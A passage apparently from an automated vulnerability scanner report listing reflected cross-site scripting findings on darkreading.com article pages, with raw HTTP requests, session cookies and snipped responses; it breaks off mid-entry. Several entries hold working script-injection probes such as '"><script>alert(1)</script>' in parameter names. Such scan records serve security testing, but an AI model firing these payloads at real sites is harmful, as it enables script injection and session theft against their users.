The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3925"><a>5a6a036882b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225702468f3925"><a>5a6a036882b/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb36c'><a>061a2b29401 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702468/index.htmleb36c'><a>061a2b29401 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 489fc"><a>153219ff849 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702468/index.html489fc"><a>153219ff849 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>'Robin Sa
...[SNIP]...
F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225702468%2Findex.html489fc%22%3E%3Ca%3E153219ff849&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225702468/index.html489fc"><a>153219ff849">
...[SNIP]...
3.568. http://www.darkreading.com/security/article/225702468/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/225702468/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65c8e"><script>alert(1)</script>0c3a0054c23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225702468/index.html?65c8e"><script>alert(1)</script>0c3a0054c23=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8dd"><a>21212bbf243 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article5f8dd"><a>21212bbf243/225702839/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e59f3"><a>48c27a4826a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225702839e59f3"><a>48c27a4826a/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc65d"><a>af65a8b6723 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702839/index.htmlfc65d"><a>af65a8b6723 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b91ec'><a>923e17d3e45 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702839/index.htmlb91ec'><a>923e17d3e45 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Tech Insi
...[SNIP]...
<a href='http://www.darkreading.com/security/article/225702839/index.htmlb91ec'><a>923e17d3e45?fmid=12004'>
...[SNIP]...
3.573. http://www.darkreading.com/security/article/225702839/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/225702839/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae1b"><script>alert(1)</script>35eba9c0f8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225702839/index.html?eae1b"><script>alert(1)</script>35eba9c0f8a=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78fe2"><a>928f4186047 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article78fe2"><a>928f4186047/226600195/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1c5"><a>ee51f059348 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/226600195be1c5"><a>ee51f059348/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe14b"><a>6463dee114d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226600195/index.htmlfe14b"><a>6463dee114d HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa57e'><a>7226366858a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226600195/index.htmlaa57e'><a>7226366858a HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Tech Insi
...[SNIP]...
<input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/226600195/index.htmlaa57e'><a>7226366858a'>
...[SNIP]...
3.578. http://www.darkreading.com/security/article/226600195/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/226600195/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c477"><script>alert(1)</script>ea3c48f051c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/226600195/index.html?9c477"><script>alert(1)</script>ea3c48f051c=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 781ee"><a>1a47923760b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article781ee"><a>1a47923760b/226700229/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f35e2"><a>fba3d4ef6bc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/226700229f35e2"><a>fba3d4ef6bc/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c2a2"><a>1e3a0d86d20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226700229/index.html1c2a2"><a>1e3a0d86d20 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a47c'><a>5fdfbca4d81 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226700229/index.html3a47c'><a>5fdfbca4d81 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Six Healt
...[SNIP]...
<a href='http://www.darkreading.com/security/article/226700229/index.html3a47c'><a>5fdfbca4d81?fmid=12079'>
...[SNIP]...
3.583. http://www.darkreading.com/security/article/226700229/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/226700229/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9198"><script>alert(1)</script>56c57a0601f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/226700229/index.html?e9198"><script>alert(1)</script>56c57a0601f=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 147ba"><a>904f6e80a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article147ba"><a>904f6e80a4/226700529/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a95"><a>51624165584 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22670052959a95"><a>51624165584/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15856"><a>07e263cf669 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/226700529/index.html15856"><a>07e263cf669 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bafe3'><a>9698950fef1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/226700529/index.htmlbafe3'><a>9698950fef1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e74a6"><a>e69df43313f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlee74a6"><a>e69df43313f/226900007/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13781"><a>8fae11895fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22690000713781"><a>8fae11895fc/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b7f9'><a>795ff27f70f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226900007/index.html6b7f9'><a>795ff27f70f HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3d26"><a>21a714eefb1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226900007/index.htmlb3d26"><a>21a714eefb1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F226900007%2Findex.htmlb3d26%22%3E%3Ca%3E21a714eefb1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/226900007/index.htmlb3d26"><a>21a714eefb1"> ...[SNIP]...
3.592. http://www.darkreading.com/security/article/226900007/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/226900007/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d6cc"><script>alert(1)</script>4adbf0a8c92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/226900007/index.html?2d6cc"><script>alert(1)</script>4adbf0a8c92=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d89d"><a>c5384af4f83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article1d89d"><a>c5384af4f83/227300150/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804a0"><a>8a47548686 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/227300150804a0"><a>8a47548686/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 76cb5'><a>6bc9e7501bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
